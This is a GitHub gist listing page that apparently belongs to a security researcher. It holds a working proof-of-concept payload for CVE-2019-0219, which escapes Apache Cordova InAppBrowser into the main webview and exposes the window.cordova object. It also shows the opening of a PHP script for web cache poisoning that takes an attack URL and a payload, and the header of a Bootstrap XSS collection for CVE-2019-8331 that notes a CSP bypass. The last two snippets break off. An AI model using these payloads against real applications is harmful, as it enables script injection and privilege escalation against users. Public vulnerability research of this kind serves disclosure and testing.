Skip to content

Instantly share code, notes, and snippets.

@BlackFan
BlackFan / CVE-2019-0219_PoC.md
Last active Jul 16, 2020
CVE-2019-0219 PoC
View CVE-2019-0219_PoC.md

Apache Cordova InAppBrowser Privilege Escalation

CVE-2019-0219

<script>
alert('InAppBrowser alert \n window.cordova = ' + JSON.stringify(window.cordova));

prompt("","gap-iab://InAppBrowser'-alert('MainWebview alert \\n window.cordova = ' + JSON.stringify(window.cordova))-'")
</script>
@BlackFan
BlackFan / webcachepoisoning.php
Last active Aug 19, 2020
webcachepoisoning.php
View webcachepoisoning.php
<?php
$attack_url = $_GET['url'];
$payload = $_GET['payload'];
$ch = curl_init();
if(isset($_SERVER['HTTP_ACCEPT'])) {
$headers[] = 'Accept: '.$_SERVER['HTTP_ACCEPT'];
}
@BlackFan
BlackFan / Bootstrap_XSS.md
Last active Nov 8, 2021
Bootstrap XSS Collection
View Bootstrap_XSS.md

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

Requires user interaction

Requires $('[data-toggle="tooltip"]').tooltip();